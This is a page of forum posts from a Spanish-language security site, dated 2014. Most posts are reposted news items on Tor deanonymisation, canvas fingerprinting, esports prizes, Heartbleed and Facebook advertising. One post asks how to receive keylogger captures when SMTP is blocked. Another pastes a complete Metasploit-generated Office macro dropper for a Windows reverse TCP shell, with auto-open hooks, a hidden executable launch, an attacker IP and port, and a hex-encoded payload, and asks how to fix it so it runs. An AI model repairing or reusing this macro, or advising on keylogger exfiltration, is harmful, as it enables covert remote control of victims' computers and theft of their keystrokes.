| |
|
82
|
Foros Generales / Noticias / Aseguran haber creado un virus que revelaría la identidad de usuarios de tor
|
en: 24 Julio 2014, 21:23 pm
|
Para algunos es un refugio de pedófilos, traficantes, drogadictos y sicarios. Para otros el único territorio para defensores de derechos humanos que luchan contra tiranías o periodistas que investigan a los poderosos. Pocos fenómenos generan interpretaciones tan opuestas en nuestros tiempos como la internet oscura o dark net.  La parte oscura de internet es un dolor de cabeza para las agencias de inteligencia. En esta parte de la red, la información se mueve cifrada y antes de llegar a destino pasa por múltiples servidores que forman parte de redes de voluntarios. Cada paso remueve un nivel de cifrado hasta que el mensaje llega al destinatario, lo que hace muy difícil rastrear al autor. Una de las formas más populares para acceder a ella es descargar un navegador especial llamado Tor. Los gobiernos y sus fuerzas de seguridad dicen que la mayoría de sus usuarios son criminales, pero sus defensores responden que simplemente están en contra de las regulaciones establecidas sobre la red y que el sueño original de sus creadores era una internet libre y anónima. Pero más allá de sus diferencias, un elemento en común une a los que ingresan a este sector de la red: mantener su anonimato. En esta lucha por mantener oculta la identidad de los internautas, los enemigos de la dark net dicen tener un arma nueva, un virus que promete revelar los secretos de este sector de la red. Pero uno de los creadores del sistema que permite el anonimato de los usuarios asegura que el virus "no es el fin del mundo". Y en el medio de este enfrentamiento se despliega una trama propia de una novela policial con conferencistas desaparecidos, filtraciones y desmentidos.  Los responsables de Tor dicen tener la situación bajo control. Virus "interesante" A comienzos de este mes, dos investigadores anunciaron sus planes de revelar una forma de combatir el anonimato en la internet oscura. Alexander Volynkin y Michael McCor, dos expertos en seguridad del equipo de respuestas de emergencias informáticas de la Universidad Carnegie Mellon (CERT), tenían planeado mostrar su arma secreta en la conferencia Black Hat que iba a tener lugar en Las Vegas en agosto. Sin embargo, un aviso publicado en el sitio de internet del evento indica ahora que los abogados de la universidad se han contactado con los organizadores de la conferencia para decirles que la presencia de Volynkin y McCor se ha cancelado. "Desafortunadamente, el señor Volynkin no podrá hablar debido a que los materiales que iba a presentar no han sido aprobados aún por el Instituto de Ingeniería Informática de la Universidad Carnegie Mellon para su difusión pública", indica el mensaje. Roger Dingledine, uno de los creadores de Tor, publicó luego un mensaje en el que señaló que Tor Project, la organización que suministra gratuitamente el programa informático para utilizar Tor, había sido "informalmente" informada de los descubrimientos que iban a ser revelados en el evento de Las Vegas. "Creo que puedo manejar lo que ellos crearon y corregirlo", dijo Dingledine y añadió: "Basados en nuestros planes actuales, instalaremos una reparación para contrarrestar este virus particular que encontraron. El virus es interesante, pero no es el fin del mundo". Fallas de sistema  Los resultados de la investigación iban a ser revelados en Las Vegas. Tor fue desarrollado originalmente por el Laboratorio de Investigación Naval de Estados Unidos y luego fue financiado por el grupo de derechos digitales Electronic Frontier Foundation, Google, la Fundación Nacional de Ciencia estadounidense, entre otros. Lo utilizan desde funcionarios, militares y periodistas que quieren comunicarse con soplones, hasta personas comunes que simplemente no quieren que los rastreen cuando navegan por la red. Pero también ha sido asociado con actividades ilegales, desde comprar heroína hasta contratar un sicario o descargar videos abusivos de menores. Los investigadores habían prometido revelar cómo un pequeño dispositivo, con un valor de US$3.000, podía ser utilizado "para explotar fallas fundamentales en el diseño y la implementación de Tor" y mostrar las direcciones de internet de sus usuarios y los servidores de computadoras utilizados para esconder sus servicios. "Lo sabemos porque lo hemos probado", añadieron. Christopher Soghoian, un experto en tecnología de la Unión de Libertades Civiles de EE.UU., especuló que la Universidad Carnegie Mellon pudo haberse preocupado por demandas de usuarios de Tor que podían alegar que su privacidad había sido violada. "Vigilar el tráfico de Tor es potencialmente una violación a varios estatutos federales criminales", escribió en un tuit Soghoian. Sin embargo, una vocera de la universidad contactada por la BBC se limitó a decir que no tenían nada que agregar "al comunicado que ya se difundió por los organizadores de la conferencia Black Hat". Buscando a Tor  El FBI es uno de los servicios de inteligencia que ha intentado ingresar a la internet oscura. Aunque los detalles de las supuestas fallas de Tor aún no han salido al dominio público, sí se han conocido varios informes de las autoridades de distintos países por ingresar en este sistema. La cadena de noticias alemana ARD informó que a comienzos de este mes, ciberespías de la Agencia Nacional de Seguridad (NSA por sus siglas en inglés) estaban vigilando dos servidores de Tor en Alemania para averiguar las direcciones de los usuarios que los utilizaban. Un supuesta filtración de la agencia de seguridad británica GCHQ indicó por su parte que este servicio de inteligencia había desarrollado su propio navegador Tor. Y en 2013, el FBI reconoció que una falla en el navegador Firefox le había permitido identificar usuarios de Tor en su esfuerzo por luchar contra la difusión de imágenes de pederastas divulgas en la red. http://www.bbc.co.uk/mundo/noticias/2014/07/140724_internet_oscura_lucha_identidad_mz.shtml
|
|
|
|
|
83
|
Foros Generales / Noticias / Visitantes de la web de la Casa Blanca blancos de software canvas fingerprinting
|
en: 24 Julio 2014, 20:58 pm
|
La Casa Blanca vigila a los visitantes de su web con un nuevo sistema de seguimiento en línea casi imposible de bloquear, según un informe de la Fundación de Fronteras Electrónicas (Electronic Frontier Foundation, EFF por sus siglas en inglés).  La EFF examinó la web oficial de la Casa Blanca para comprobar si usa el 'software' espía secreto recientemente revelado y encontró que este está presente en todas las páginas del sitio. A principios de esta semana el portal ProPublica aseguró que al menos el 5% de los 100.000 sitios más importantes de Internet utilizan el 'software', denominado 'canvas fingerprinting' (sistema de identificación mediante huellas digitales), que es casi imposible de detener con el uso de herramientas de privacidad convencionales. El 'software' utilizado por la Casa Blanca en su web fue desarrollado por el proveedor de marcadores sociales AddThis, y se emplea en sitios web populares. Una lista de los sitios conocidos que utilizan el mencionado 'software' se puede consultar aquí. Para efectuar vigilancia, un sitio web normalmente envía 'cookies' o archivos a un ordenador determinado, o examina varias propiedades del dispositivo, pero sistemas antirrastreo son capaces de bloquear ese tipo de actividades. No obstante, el nuevo sistema de seguimiento no transmite 'cookies' ni archivos y no necesita leer las propiedades, y para navegadores web y herramientas antirrastreo su mecanismo parece operar como el de una página web normal. Cuando un usuario visita un sitio web que cuenta con este tipo de tecnología de seguimiento, la página envía a su navegador de Internet una petición para generar una imagen oculta que contiene un texto. Debido a que cada ordenador representa la imagen de una manera diferente, el dibujo, es decir, sus 'huellas digitales', se utiliza para etiquetar el dispositivo con un número único que permite a los seguidores vigilar la actividad de navegación del usuario a través de Internet. Es de destacar que el uso de este tipo de 'software' contradice las políticas de privacidad publicadas en la propia página de la Casa Blanca. AddThis, a su vez, indica que no utiliza ningún tipo de dato que recoge de los sitios web del Gobierno. Hasta el momento, dice tener sólo los datos usados para "la investigación y el desarrollo interno". http://actualidad.rt.com/actualidad/view/134931-casa-blanca-vigila-web-addthis-software
|
|
|
|
|
84
|
Foros Generales / Noticias / Cómo hacerse millonario jugando un videojuego
|
en: 23 Julio 2014, 05:56 am
|
Un equipo de jugadores chinos se embolsilló US$5 millones de premio tras ganar el torneo de videojuegos más lucrativo del mundo.  Este año hubo torneos masivos de varios de varios juegos. The International enfrenta a los mejores jugadores de Dota2, un juego creado por Valve. El equipo NewBee venció a otro equipo chino, llamado Vici Gaming, y se hizo con el título. Entre todos los premios se repartieron un total de US$10,9 millones. Además de lo que se llevaron los ganadores, los subcampeones ganaron US$1,4 millones, y el resto se distribuyó entre los otros 19 equipos del torneo, que comenzó el 18 de julio en Seattle y duró cuatro días. Valve donó US$1,6 millones del dinero del premio. El resto lo aportaron jugadores habituales de Dota2, una batalla online para PC que tiene enganchados a millones de jugadores en todo el mundo. En el juego, cada jugador asume el rol de uno de los 107 héroes. Los jugadores deben colaborar para defenderse y destruir los "ancestros" del rival: estructuras muy protegidas, ubicadas en esquinas opuestas del mapa del juego.  El desarrollador del juego, Valve, donó dinero para los premios del torneo. En la página web del torneo se pudieron ver retransmisiones en directo de las partidas. Valve organizó también series para enseñar a jugar a nuevos participantes. Un buen año Algunos bares, pubs y centros recreativos de todo el mundo organizaron fiestas para la gente que quería ver las finales. El juego definitivo se pudo ver también en uno de los canales de la web de retransmisiones ESPN. "Valve ha pensado mucho en cómo empaquetar videojuegos deportivos para que la gente pueda seguirlos, verlos y disfrutarlos", escribió Alice O´Connor en una entrada en la web Rock, Paper, Shotgun. Michael O´Dell, jefe del equipo británico Team Dignitas, dijo: "Este año ha sido excepcional para eSports (un programador de videojuegos), con torneos masivos de Dota, League of Legends y CS:go (Counter-Strike: Global Offensive). Y vendrán otros. La escena es muy dinámica". http://www.bbc.co.uk/mundo/noticias/2014/07/140722_videojuegos_concurso_premios_ac.shtml
|
|
|
|
|
85
|
Seguridad Informática / Hacking / Algún sistema de memoria en la nube que permita recibir archivos usando solo IP
|
en: 2 Julio 2014, 23:41 pm
|
|
Existe algún servicio en la nube, que me permita recibir archivos y datos utilizando la dirección IP para el envió.
Por poner un ejemplo, si utilizo un Keylogger, y no se me permite enviar los datos que el Keylogger a capturado a un correo electrónico, porque mi ISP tiene bloqueado el protocolo simple de transferencia de email (SMTP) y no me es posible enviar esos datos a mi ordenador personal, porque mi conexión a internet no es permanente.
Que método se podría utilizar en ese caso?
He buscado en google y no he encontrado nada
|
|
|
|
|
86
|
Seguridad Informática / Análisis y Diseño de Malware / Error al ejecutar payload en formato vbs de metasploit que linea debo modificar
|
en: 22 Junio 2014, 03:10 am
|
Este es el error que me aparece al ejecutar el payload shell reverse tcp en formato vbs Windows Script Host Secuencia de comandos: C: ubicacion del payload Linea: 24 Caracter: 13 Error: Expected end of statement Codigo: 800A0401 Origen: Microsoft VBScript compilation error El codigo fuente del vbs es este: 'Created by msfpayload ( http://www.metasploit.com).'Payload: windows/shell/reverse_tcp ' Length: 290 'Options: {"LHOST"=>"197.186.55.5", "LPORT"=>"4441"} '************************************************************** '* '* This code is now split into two pieces: '* 1. The Macro. This must be copied into the Office document '* macro editor. This macro will run on startup. '* '* 2. The Data. The hex dump at the end of this output must be '* appended to the end of the document contents. '* '************************************************************** '* '* MACRO CODE '* '************************************************************** Sub Auto_Open() Iobcf12 End Sub Sub Iobcf12() Dim Iobcf7 As Integer Dim Iobcf1 As String Dim Iobcf2 As String Dim Iobcf3 As Integer Dim Iobcf4 As Paragraph Dim Iobcf8 As Integer Dim Iobcf9 As Boolean Dim Iobcf5 As Integer Dim Iobcf11 As String Dim Iobcf6 As Byte Dim Kijfmicoeo as String Kijfmicoeo = "Kijfmicoeo" Iobcf1 = "URqWyDZMrNhdF.exe" Iobcf2 = Environ("USERPROFILE") ChDrive (Iobcf2) ChDir (Iobcf2) Iobcf3 = FreeFile() Open Iobcf1 For Binary As Iobcf3 For Each Iobcf4 in ActiveDocument.Paragraphs DoEvents Iobcf11 = Iobcf4.Range.Text If (Iobcf9 = True) Then Iobcf8 = 1 While (Iobcf8 < Len(Iobcf11)) Iobcf6 = Mid(Iobcf11,Iobcf8,4) Put #Iobcf3, , Iobcf6 Iobcf8 = Iobcf8 + 4 Wend ElseIf (InStr(1,Iobcf11,Kijfmicoeo) > 0 And Len(Iobcf11) > 0) Then Iobcf9 = True End If Next Close #Iobcf3 Iobcf13(Iobcf1) End Sub Sub Iobcf13(Iobcf10 As String) Dim Iobcf7 As Integer Dim Iobcf2 As String Iobcf2 = Environ("USERPROFILE") ChDrive (Iobcf2) ChDir (Iobcf2) Iobcf7 = Shell(Iobcf10, vbHide) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub '************************************************************** '* '* PAYLOAD DATA '* '************************************************************** Kijfmicoeo &H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HE8&H00&H00&H00&H0E&H1F&HBA&H0E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H93&H38&HF0&HD6&HD7&H59&H9E&H85&HD7&H59&H9E&H85&HD7&H59&H9E&H85&HAC&H45&H92&H85&HD3&H59&H9E&H85&H54&H45&H90&H85&HDE&H59&H9E&H85&HB8&H46&H94&H85&HDC&H59&H9E&H85&HB8&H46&H9A&H85&HD4&H59&H9E&H85&HD7&H59&H9F&H85&H1E&H59&H9E&H85&H54&H51&HC3&H85&HDF&H59&H9E&H85&H83&H7A&HAE&H85&HFF&H59&H9E&H85&H10&H5F&H98&H85&HD6&H59&H9E&H85&H52&H69&H63&H68&HD7 Intente borrando el texto, que aparece en arteriscos y la codificación que aparece al final Recopile el código en codeblock, para ver cuál era la línea de código del error, solo logre ver que la línea 24 queda, donde aparece el texto en arteriscos al final pero no se cual es el carácter 13 Que parte del código debo modificar para que funcione?
|
|
|
|
|
87
|
Foros Generales / Noticias / ¿Cuánto daño causaron realmente los ciberataques de 2014?
|
en: 14 Junio 2014, 18:01 pm
|
El agregador de noticias Feedly se convirtió en la última de víctima de los hackers. La empresa informó que un ataque en la red impide a sus usuarios acceder a sus servicios.  Hackers impidieron a Evernote y a Feedly prestar sus servicios. A través de su blog, la empresa informó que los perpetradores "están extorsionándonos para obtener dinero", solo así estarían dispuestos a revertir el daño que han causado. Pero los representantes de Feedly se negaron a pagar. Algo muy similar le ocurrió al popular servicio de organización de información Evernote. No son los primeros ataques que llevan a cabo criminales cibernéticos que ocurren este año, y lo más probable es que tampoco sean los últimos. A continuación, BBC Mundo le presenta tres de los más importantes que han tenido lugar en 2014. Heartbleed Las alarmas informáticas se activaron alrededor del 8 de abril. Expertos en seguridad cibernética advirtieron que se trataba de uno de los errores de programación (bug, en inglés) más peligrosos de los últimos años y recomendaron a los usuarios de internet cambiar sus contraseñas. Heartbleed es una falla en el sistema que se utiliza para cifrar información personal que circula en la red y que puede incluir datos financieros y médicos. El rango de aspectos expuestos es amplio y difícil de determinar porque el error del software le permite a los atacantes ver parte de la información que se quedó en la memoria del servidor. El mecanismo que protege los datos cuando pasan de un punto es conocido como SSL/TLS y es muy común, por lo que Google, Yahoo, Facebook, Tumblr, Amazon Web Services y otras importantes compañías que funcionan con este sistema, estuvieron en riesgo.  Las contraseñas de millones de usuarios estuvieron, y pueden seguir estando en riesgo, con Heartbleed. "17% de sitios web fueron atacados, lo que equivale a más de medio millón. Pero podrían ser muchos más, el problema en este caso es que el fallo puede producirse sin ser detectado porque quienes manejan los sitios web quizás no encontraron evidencia del ataque", le explicó a BBC Mundo Paul Mutton, de Netcraft, una empresa que ofrece servicios de seguridad informática. Pocos días después de que se supo acerca de la amenaza de Heartbleed, el organismo impositivo canadiense, Canada Revenue Agency, reveló que el número de seguro social de 900 personas fue sustraído de sus sistemas. Mientras que Mumsnet, un sitio web británico para madres, confirmó que contraseñas y mensajes personales enviados por sus miembros aparecieron en internet. Goto fail A mediados de abril Apple hizo pública una actualización de su sistema operativo OS X, porque descubrió que sus usuarios podrían ser víctimas de hackers al utilizar internet, en un caso similar al de Heartbleed. El problema estaba en la conexión que se establece entre el navegador de Apple, Safari, y varios sitios web, entre los que se cuentan bancos, Google y Facebook. La gran mayoría de los websites cuenta con un sistema de seguridad que protege la información que circula en la red. Pero este mecanismo quedó expuesto por la falla que afectó a los propietarios de modelos de iPhone, iPad, iPod y computadoras de Apple que funcionan con OS X. "Al saber que existe este error, el atacante podría interceptar la comunicación entre los usuarios y los sitios web que visiten, robando sus contraseñas y nombres de usuarios. También podría volver a cifrar los datos obtenidos y distribuirlos como quisiera. Es lo que se conoce como el ataque del 'hombre en el medio'", le dijo a la publicación especializada MIT Technology Review Simson Garfinkel, experto en seguridad informática.  Los errores de las versiones de Internet Explorer que van del número 6 al 11 afectaron a quienes tienen Windows XP. "Zero-day exploit" (CVE-2014-1776) La seguridad y confiablidad de las diferentes versiones del navegador de Microsoft, Internet Explorer –que van desde la 6 hasta la 11- se pusieron en duda los últimos días de abril. Un error de programación permitió que hackers pudieran tomar control de computadoras que funcionan con el sistema operativo Windows XP. Para desespero de los usuarios, la falla, cuya existencia fue confirmada por la empresa de seguridad informática Symantec, "congelaba" la pantalla de quienes recurrían a Explorer para utilizar internet. El sitio de estadísticas de tecnología en internet, NetMarket Share, calcula que más del 50% del mercado mundial de navegadores emplea Explorer. Mientras que algunos especialistas estiman que alrededor de 30% de computadoras de escritorio utilizan Windows XP, lo que convierte a sus propietarios en potenciales víctimas. Cambiar de navegador fue una de las principales opciones para disminuir el riesgo en el momento, recomendada incluso por el gobierno estadounidense. Con respecto al sistema operativo, una actualización podría ayudar. http://www.bbc.co.uk/mundo/noticias/2014/06/140611_tecnologia_efectos_ataques_ciberneticos_kv.shtml
|
|
|
|
|
88
|
Foros Generales / Foro Libre / Científicos 'explican' por qué España perdió con Holanda
|
en: 14 Junio 2014, 15:54 pm
|
¿Por qué España perdió frente a Holanda? Visión científica sobre el fútbol y el Mundial  ¿Alguien puede explicar por qué España cayó de esa forma ante Holanda? Física, psicología, aerodinámica: les presentamos las mejores investigaciones científicas y descubrimientos relacionados con el fútbol en su conjunto y con el Mundial en concreto. Caída de estrellas deportivas Investigadores franceses, que publicaron su trabajo en la revista 'Psychological Science', descubrieron que un 'equipo de ensueño', formado por estrellas, a menudo muestra resultados mediocres. Su investigación fue importante no solo para el fútbol, sino también para los deportes de equipo, en particular, a lo referente con la Asociación Nacional de Baloncesto (NBA). Los científicos afirman que las estrellas coordinan mal sus acciones, tienden a actuar por su cuenta, lo que resulta en un desastre para todo el equipo. Según estos psicólogos franceses, es probable que los equipos formados por estrellas abandonen el Mundial en Brasil ya en el inicio. Sin embargo, los investigadores no especificaron qué equipos tenían en mente. Después de la humillante derrota de España frente a Holanda su idea queda más clara. Juego browniano Científicos japoneses, cuyo artículo fue publicado en la revista 'European Physical Journal B', demostraron que un partido de fútbol es similar al movimiento browniano, movimiento aleatorio de partículas muy pequeñas de materia bajo la influencia de las colisiones de las moléculas. Primero en base teórica, y luego en la práctica, los científicos fueron capaces de demostrar que en el fútbol, como en el movimiento browniano, no se puede predecir nada después de unas pocas decenas de segundos. Según los investigadores, esto muestra claramente la ventaja del fútbol sobre otros tipos de deportes: el hockey, el baloncesto, el béisbol, etc. Brazuca en el túnel de viento Investigadores australianos estudiaron las capacidades del balón oficial del Mundial, el Brazuca. Además, lo compararon con el Jabulani de Sudáfrica, ambos fabricados por Adidas. Como resultado, ocurrió que la pelota anterior tenía una trayectoria imprevisible. Los investigadores metieron al Brazuca en el túnel de viento durante casi un mes y encontraron que es mucho más adecuado para el fútbol que su predecesor. Según los científicos, las ranuras presentes en la superficie de Brazuca proporcionan coincidencia de la trayectoria del vuelo de la bola con la dirección del impacto. Así que ahora para los atacantes será más fácil dar en el blanco que antes. http://actualidad.rt.com/deporte/view/131064-futbol-razon-perdida-espana-ciencia
|
|
|
|
|
89
|
Foros Generales / Noticias / Facebook comienza a 'vender' los datos personales de sus usuarios
|
en: 14 Junio 2014, 15:48 pm
|
Facebook dio un paso más en la dirección de obtener beneficios comerciales aprovechándose de las vidas de sus usuarios y aseguró que permitirá a los anunciantes obtener datos de los hábitos de navegación en la red social.  Facebook acaba de anunciar que planea compartir los historiales de navegación de sus usuarios con las empresas anunciantes con el propósito de que la publicidad llegue con más efectividad a los internautas, informa el diario de negocios 'Wall Street Journal'. "Lo que hemos escuchado de la gente es que quiere una publicidad dirigida más específicamente hacia ellos", dijo Brian Boland, vicepresidente de Facebook a cargo de los anuncios de marketing de producto. "El objetivo es dejarle claro a la gente por qué vio el anuncio", agregó. Facebook permitirá a sus usuarios ver los expedientes de gustos e intereses que tiene sobre ellos y cambiar información contenida en esos archivos. Y si no le gusta el anuncio que le envían, el usuario también será capaz de elegir qué tipo de mensajes de marketing prefiere ver. Los datos de los usuarios de la compañía, con sede en Silicon Valley, se basan principalmente en las actividades de la gente en su sitio, como por ejemplo darle 'Me gusta' a páginas de marcas o compartir un anuncio divertido. Los usuarios "quieren expectativas muy claras y quieren tener control sobre la publicidad que ven", destaca Brian Boland. Mientras tanto, los defensores de la privacidad expresaron su preocupación y varios pidieron que la Comisión Federal de Comercio examine la decisión. El acuerdo de Facebook con la Comisión requiere avisar a los consumidores y obtener el consentimiento antes de compartir información. http://actualidad.rt.com/sociedad/view/131072-facebook-venta-datos-personales-usuarios
|
|
|
|
|
|
| |
|